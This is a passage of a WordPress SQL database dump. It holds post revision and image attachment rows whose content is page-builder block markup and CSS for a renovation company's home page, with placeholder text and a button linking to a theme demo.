32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Aldus PageMaker including</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"8ade65a6-95be-43c3-a862-faf812de3e49\"} -->\n<style type=\"text/css\"> .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8ade65a6-95be-43c3-a862-faf812de3e49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6c332def-c8d3-4470-b49f-90dc1ba0fb14\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"dc07bcbb-e525-4314-b589-15be45dc4e59\"} -->\n<style type=\"text/css\"> .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-dc07bcbb-e525-4314-b589-15be45dc4e59 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"d6b07e0e-145d-4fcf-b0ab-81e1597b2431\"} -->\n<style type=\"text/css\"> .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a76f9b72-1972-4fc1-9508-94e879ce8fe8\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a76f9b72-1972-4fc1-9508-94e879ce8fe8\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"ee5678bf-92ed-4865-aa79-230e1108a2f5\"} -->\n<style type=\"text/css\"> .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ee5678bf-92ed-4865-aa79-230e1108a2f5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a5cb6a55-72ca-447b-9d80-e0be7d2f2b89\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\" rel=\"noopener noreferrer\" target=\"_blank\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"eca83834\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-24 23:11:37','2022-08-24 23:11:37','',336,'https://cteisys.com/?p=482',0,'revision','',0),(485,1,'2022-08-24 23:19:47','2022-08-24 23:19:47','','owens corning','','inherit','','closed','','owens-corning','','','2022-08-24 23:19:47','2022-08-24 23:19:47','',263,'https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg',0,'attachment','image/jpeg',0),(486,1,'2022-08-24 23:19:57','2022-08-24 23:19:57','','tamco','','inherit','','closed','','tamco','','','2022-08-24 23:19:57','2022-08-24 23:19:57','',263,'https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `wp0y_posts` VALUES (487,1,'2022-08-24 23:20:48','2022-08-24 23:20:48','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f90851d4-c514-47ae-86e7-eec3151567da\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f90851d4-c514-47ae-86e7-eec3151567da background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ec9b4f49-717b-424d-8c1f-2e6b2881e683\"} -->\n<style type=\"text/css\"> .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 